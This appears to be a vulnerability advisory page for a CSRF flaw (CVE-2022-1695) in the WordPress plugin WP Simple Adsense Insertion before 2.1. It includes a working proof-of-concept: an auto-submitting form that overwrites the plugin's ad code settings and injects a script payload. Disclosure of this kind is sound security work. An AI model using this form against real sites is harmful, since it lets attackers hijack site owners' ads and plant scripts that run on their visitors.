Lucene search
Daniel RufWPEX-ID:2AC5B87B-1390-41CE-AF6E-C50E5709BAAAHistoryMay 12, 2022 - 12:00 a.m.
WP Simple Adsense Insertion < 2.1 - Inject ads and javascript via CSRF
2022-05-1200:00:00
Daniel Ruf
84
0.001 Low
EPSS
Percentile
26.0%
The plugin does not perform CSRF checks on updates to its admin page, allowing an attacker to trick a logged in user to manipulate ads and inject arbitrary javascript via submitting a form.
<form id="test" action="https://example.com/wp-admin/options-general.php?page=wordpress-plugin-for-simple-google-adsense-insertion/WP-Simple-Adsense-Insertion.php" method="POST">
<input type="text" name="info_update" value="true">
<input type="text" name="wp_ad_camp_1_code" value="hacked">
<input type="text" name="wp_ad_camp_2_code" value="<script>alert('boo!')</script>">
<input type="text" name="wp_ad_camp_3_code" value="">
<input type="text" name="wp_ad_camp_4_code" value="">
<input type="text" name="wp_ad_camp_5_code" value="">
<input type="text" name="wp_in_article_ad_code" value="">
<input type="text" name="wp_post_article_ad_code" value="hacked">
<input type="text" name="info_update" value="Update options">
</form>
<script>
document.getElementById("test").submit();
</script>Related
patchstack
patchstack
cve
cve
CVE-2022-1695
2022-06-08 10:15:10
wpvulndb
wpvulndb
WP Simple Adsense Insertion < 2.1 - Inject ads and javascript via CSRF
2022-05-12 00:00:00
cnvd
cnvd
WordPress WP Simple Adsense Insertion plugin跨站请求伪造漏洞
2022-06-13 00:00:00
prion
prion
Cross site request forgery (csrf)
2022-06-08 10:15:00
nvd
nvd
CVE-2022-1695
2022-06-08 10:15:10
cvelist
cvelist